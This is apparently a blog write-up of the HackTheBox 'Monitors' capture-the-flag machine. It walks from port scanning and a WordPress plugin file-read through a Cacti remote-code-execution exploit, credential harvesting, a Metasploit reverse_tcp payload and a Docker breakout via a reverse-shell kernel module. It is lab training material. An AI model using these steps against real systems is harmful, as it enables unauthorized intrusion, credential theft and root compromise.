Monitors (HackTheBox) — Write-up
In this blog we will see walk-through of HackTheBox machine — Monitors
Like all machines, we begin by enumerating open ports with nmap scan -
nmap -sC -Sv 10.10.10.238
Seeing as port 80 is hosting a web-server lets check -
Since direct access is blocked add monitors.htb to your /etc/hosts file and now lets check again
Now here we get to know that this is an WordPress website so let’s try wpscan and find if there is any vulnerable plugin -
wpscan -url http://www.monitors.htb
Here we find a plugin wp-with-spritz while enumerating I found an exploit-db https://www.exploit-db.com/exploits/44544 this plugin is vulnerable so now let’s check it using burp-suit
It worked now lets check the Word-press database file wp-config.php
Here we got the db_password now lets find where to use it by fuzzing here we can see a file
Now let’s add cacti-admin.monitors.htb to our /etc/hosts file and check
Here we can use that username and password we find earlier and can successfully get logged in
The version of this service is 1.2.12 that has an authenticated remote code execution exploit — https://www.exploit-db.com/exploits/49810
Now run -
nc nlvp 4444
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p (password) -lhost (your ip addr) -lport 4444
Now you will get a shell first make it interactive using
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Here still we have not got the user flag I found some files but was unable to read it so I tried using
grep ‘marcus’ /etc -R 2>/dev/null
I looked at the content present in the file -
Here got password for the user marcus let’s
ssh marcus@monitors.htb.
Here I found docker was running so I used netstat -tulnp and found port 8443 running
Now to see what’s running on it let’s forward the port
ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238
Now visit — http://127.0.0.1:8443
Here this Version : 9.0.31 have an exploit related to deserialization https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/
Now run msfconsole
And write options to setup the exploit
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.16.64
set RHOSTS 127.0.0.1
set FORCEEXPLOIT truerun
Now finally we got a shell first make it interactive by running this command
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Now, we are into the docker container. After this, we have to breakout from the container to the host
cpash -print
Here we see cap_sys_module this will help us to get root https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
Copy the source code and Makefile on local machine and the ip and port so that we could listen on host now wget this files on the target machine
Now run -
make clean
make
After this succeeds first listen on local machine using
nc -nlvp 4445
Lastly, execute the exploit on the docker container — insmod reverse-shell.ko
